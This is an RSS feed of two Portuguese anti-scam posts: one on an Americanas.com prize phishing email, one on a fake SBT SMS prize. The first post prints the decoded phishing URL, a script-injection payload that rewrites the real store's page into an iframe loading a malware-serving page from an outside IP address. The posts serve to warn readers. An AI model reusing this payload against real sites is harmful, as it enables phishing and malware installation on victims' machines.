<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Balela.info &#187; prêmio</title>
	<atom:link href="http://balela.info/tag/premio/feed/" rel="self" type="application/rss+xml" />
	<link>http://balela.info</link>
	<description>Seu repositório de pragas virtuais</description>
	<lastBuildDate>Wed, 21 Jul 2010 15:19:21 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>AMERICANAS.COM &#8211; Voce foi sorteado!</title>
		<link>http://balela.info/americanascom-voce-foi-sorteado/</link>
		<comments>http://balela.info/americanascom-voce-foi-sorteado/#comments</comments>
		<pubDate>Thu, 17 Apr 2008 18:15:08 +0000</pubDate>
		<dc:creator>Manoel Netto</dc:creator>
				<category><![CDATA[Engenharia Social]]></category>
		<category><![CDATA[Mentira]]></category>
		<category><![CDATA[Phishing Scam]]></category>
		<category><![CDATA[Americanas.com]]></category>
		<category><![CDATA[prêmio]]></category>
		<category><![CDATA[Sorteio]]></category>

		<guid isPermaLink="false">http://balela.info/arquivo/americanascom-voce-foi-sorteado/</guid>
		<description><![CDATA[Scam da Americanas.com simula um sorteio de TV LCD e usa JavaScript para levar o usuário ao site malicioso, além de java para instalar malware em seu computador.]]></description>
			<content:encoded><![CDATA[<p>Entre os vários tipos de <strong><span class='wp_keywordlink'><a href="http://balela.info/phishing-scam/" title="Phishing Scam" target="_blank">phishing</a></span> <span class='wp_keywordlink'><a href="http://balela.info/phishing-scam/" title="Phishing Scam" target="_blank">scam</a></span></strong> que existem, os que dão mais resultado são os que oferecem algum prêmio. O fato de oferecer algo caro e que seja um sonho de consumo da pessoa, um carro, celular, computador, TV de Plasma, o que seja, faz com que o destinatário fique cego e não perceba os truques presentes.</p>
<p>Esse <span class='wp_keywordlink'><a href="http://balela.info/phishing-scam/" title="Phishing Scam" target="_blank">scam</a></span> é até muito bem feito, pois usa uma técnica diferente para direcionar o usuário ao endereço malicioso e applet java para instalar <span class='wp_keywordlink'><a href="http://balela.info/malware/" title="Software Malicioso (virus" target="_blank">malware</a></span>. Algo chamado Javascript Injection. O link possui uma instrução que invalida todo o restante, então, para os leigos, o link está corretamente direcionado para o site das Lojas Americanas. Outras dicas são:</p>
<ol>
<li>Você alguma vez comprou no site Americanas.com ou Submarino.com? Caso contrário, qualquer e-mail que chegue dizendo-se passar por um desses serviços é MENTIRA. Apague imediatamente.</li>
<li>Não achou estranho você ser &#8220;sorteado&#8221; e nem mesmo o seu nome aparecer no e-mail? E como assim você precisa &#8220;validar seu e-mail&#8221;? Eles sabem quem é você, possuem seu endereço completo e seu telefone. Algum motivo para enviarem um e-mail?</li>
<li>Note o link. Ele veio enorme e com muitos caracteres estranhos, não? Isso é uma tentativa de execução de javascript direto no seu navegador. Recebi 2 e-mails desses, mas só o segundo continha o código correto, o primeiro não fazia absolutamente nada, ou seja, os &#8220;hackers phodões&#8221; fizeram merda e erraram o código. A URL depois de decodificada fica assim:<br />
<blockquote><p>http://carrinho.americanas.com.br/portal/meuCadastro.portal?_nfpb=true&amp; LoginControllerPortlet_actionOverride=&lt;script&gt;window.onload=function(){ with(document.body.style){border=&#8221;none&#8221;;margin=&#8221;0 0 0 0&#8243;};document.body.innerHTML=&#8217;&lt;iframe src=http://203.124.22.143/java/index.htm style=border:none;height:700;width:1000&gt;&#8217;};document.title=&#8217;Americanas&#8217; &lt;/script&gt;&lt;textarea&gt;</p></blockquote>
</li>
<li>Ao entrar no site que o e-mail tentava direcionar, abre-se uma tela pedindo solicitação para instalar um JAVA. Atenção! Um applet java possui os mesmos direitos de acesso ao seu computador que o usuário que o está executando, em sua maioria, o administrador. Isso é um perigo potencial e instalar essa solicitação é altamente desaconselhada. A tela exibida está abaixo.</li>
</ol>
<p><strong>Mensagem original (screenshot)</strong></p>
<p><a href="http://flickr.com/photos/manoelnetto/2421020266/" title="Flickr: Americanas.com Você foi sorteado" target="_blank"><img src="http://farm3.static.flickr.com/2276/2421020266_27aee6b572.jpg?v=0" title="Flickr: Americanas.com Você foi Sorteado" alt="Flickr: Americanas.com Você foi Sorteado" border="0" height="500" width="381" /></a></p>
<p><strong>Tela que simula o site Americanas.com (screenshot)</strong></p>
<p><a href="http://flickr.com/photos/manoelnetto/2421616150/" title="Flickr: Americanas.com Você foi sorteado" target="_blank"><img src="http://farm3.static.flickr.com/2394/2421616150_4933eb97f5.jpg?v=0" title="Flickr: Americanas.com Você foi Sorteado" alt="Flickr: Americanas.com Você foi Sorteado" border="0" height="455" width="500" /></a></p>
<p><strong>Mensagem original (texto)</strong></p>
<blockquote><p>Você está entre os 10 e-mails sorteados da Promoção Cliente Especial. TV 42&#8243; LCD (1920 X 1080 Pixels), Full HD, 2 Conexões HDMI e Double Window &#8211; 42LY3RF &#8211; LG</p>
<p>Seu e-mail foi sorteado entre os milhares em nosso banco de dados e você foi selecionado para ganhar uma <a href="http://tecnocracia.com.br/shopping/tv-lcd" title="Shopping - Veja ofertas de TV LCD na TecnoLojinha" target="_blank">TV LCD</a>! Apenas 10 e-mails foram sorteados, e desses 10, apenas 1 será o ganhador da Promoção Americanas Cliente Especial. Você está na reta final para ter uma TV LCD 42&#8243;, basta acessar nosso link clicando no botão Validar Email logo abaixo e confirmar seu nome e endereço</p>
<p>ATENÇÃO: A Americanas.com não solicita dados como cartão de credito por e-mail.</p>
<p>Sempre confira se o link é para o site verdadeiro da Americanas.com</p>
<p>Nunca informe sua senha para terceiros.</p>
<p>Seu e-mail precisa ser verificado por você caso deseje participar da promoção. Para isso basta clicar no botão Validar E-mail.</p>
<p><cite>Mensagem recebida por e-mail em 16/04/2008</cite></p></blockquote>
<div id="crp_related"><h4 class="section-title">TEXTOS RELACIONADOS</h4><ul><li><a href="http://balela.info/americanascom-voce-foi-sorteado-2/" rel="bookmark" class="crp_title">Americanas.com &#8211; Voce foi sorteado</a></li><li><a href="http://balela.info/pedidos-confirmados-scam-da-americanascom/" rel="bookmark" class="crp_title">Pedidos confirmados &#8211; Scam da Americanas.com</a></li><li><a href="http://balela.info/setor-financeiro-americanas-relatorio-de-debito/" rel="bookmark" class="crp_title">Setor financeiro americanas: relatorio de debito</a></li><li><a href="http://balela.info/some-da-minha-vida/" rel="bookmark" class="crp_title">Some da minha vida</a></li><li><a href="http://balela.info/oi-torpedo-multimidia/" rel="bookmark" class="crp_title">OI Torpedo Multimídia</a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://balela.info/americanascom-voce-foi-sorteado/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>SBT: seu aparelho móvel foi premiado</title>
		<link>http://balela.info/sbt-seu-aparelho-movel-foi-premiado/</link>
		<comments>http://balela.info/sbt-seu-aparelho-movel-foi-premiado/#comments</comments>
		<pubDate>Sun, 06 Jan 2008 18:26:21 +0000</pubDate>
		<dc:creator>Lu Monte</dc:creator>
				<category><![CDATA[Engenharia Social]]></category>
		<category><![CDATA[Mentira]]></category>
		<category><![CDATA[carro]]></category>
		<category><![CDATA[Celular]]></category>
		<category><![CDATA[Golpe]]></category>
		<category><![CDATA[prêmio]]></category>
		<category><![CDATA[SBT]]></category>
		<category><![CDATA[SMS]]></category>
		<category><![CDATA[Torpedo]]></category>

		<guid isPermaLink="false">http://balela.info/arquivo/sbt-seu-aparelho-movel-foi-premiado/</guid>
		<description><![CDATA[Dinheiro não dá em árvore e carro não cai do céu. Mesmo assim, tem gente que acredita tanto na própria sorte que se acha capaz de ganhar prêmios do nada, via SMS.]]></description>
			<content:encoded><![CDATA[<p>Dinheiro não dá em árvore e carro não cai do céu. Mesmo assim, tem gente que acredita tanto na própria sorte que se acha capaz de ganhar prêmios do nada, via SMS. Se você recebeu um &#8220;torpedo&#8221; dizendo que ganhou um carro ou qualquer outra coisa, pense:</p>
<ol>
<li>Você participou de algum concurso relacionado à empresa que, supostamente, enviou o torpedo?</li>
<li>A empresa informou que entraria em contato por SMS?</li>
<li>Se você se acha mesmo tão sortudo, desconfie por um segundo e visite o site da empresa, ou ligue para o seu Serviço de Atendimento oficial. <a title="SBT - Sistema Brasileiro de Televisão" href="http://www.sbt.com.br/default.asp" target="_blank">Uma visita ao site do SBT</a>, por exemplo, esclareceria qualquer dúvida, graças ao <em>pop-up</em> (bem que podiam ter incorporado o texto à própria tela de entrada) com o aviso:<br />
<blockquote><p><strong>IMPORTANTE:<br />
Recebeu uma mensagem dizendo que ganhou um prêmio do SBT? Cuidado!</strong><br />
Se você recebeu uma mensagem SMS dizendo que participou de uma promoção do SBT e que é um ganhador, cuidado: o SBT não entra em contato com os ganhadores através de mensagem de texto e jamais pede que seja feito qualquer depósito em dinheiro ou exige a compra de algum produto em troca. Jamais forneça seus dados pessoais ou desembolse qualquer quantia em dinheiro. Fique atento, pois é fraude!</p></blockquote>
</li>
<li><strong>Sim, é fraude</strong>. Se você não resistir e ligar para o tal número, o golpista solicitará que compre alguns cartões pré-pagos de recarga para celular e que torne a ligar para informar os números dos cartões. Esse seriais são usados por criminosos para comandarem seus &#8220;negócios&#8221; de dentro da prisão, ou são vendidos por um valor inferior ao de face.</li>
<li>Na pior das hipóteses, você acabará fornecendo seus dados pessoais e poderá ser vítima do golpe do seqüestro-relâmpago no futuro.</li>
</ol>
<p>Não seja enganado pela sua própria ganância, sim?</p>
<p><strong>Mensagem Original</strong>:</p>
<blockquote><p>(SBT): GUGU 25 ANOS, INFORMA SEU APARELHO MOVEL,FOI PREMIADO,E VC GANHOU 1GOL FLEX 0KM + INF:LIGUE GRATIS DE SEU FIXO, XX-XXXXXXXX LIGUE URGENTE</p>
<p><cite>Mensagem recebida via telefone celular em 3 de janeiro de 2008.</cite></p></blockquote>
<p>* Colaborou: <a title="Fabio Seixas, versão txt" href="http://blog.fabioseixas.com.br/" target="_blank">Fabio Seixas</a>.</p>
<p>[tags]carro,celular,golpe,prêmio,sbt,sms,torpedo[/tags]</p>
<div id="crp_related"><h4 class="section-title">TEXTOS RELACIONADOS</h4><ul><li><a href="http://balela.info/promocao-motorola-meu-v3/" rel="bookmark" class="crp_title">Promocao motorola meu V3</a></li><li><a href="http://balela.info/voce-recebeu-um-email-torpedo-multimidia-vivo/" rel="bookmark" class="crp_title">Você recebeu um email Torpedo Multimidia &#8211; Vivo</a></li><li><a href="http://balela.info/feliz-natal-voce-ganhou-um-iphone-de-presente/" rel="bookmark" class="crp_title">Feliz Natal você ganhou um iPhone de presente</a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://balela.info/sbt-seu-aparelho-movel-foi-premiado/feed/</wfw:commentRss>
		<slash:comments>1862</slash:comments>
		</item>
	</channel>
</rss>
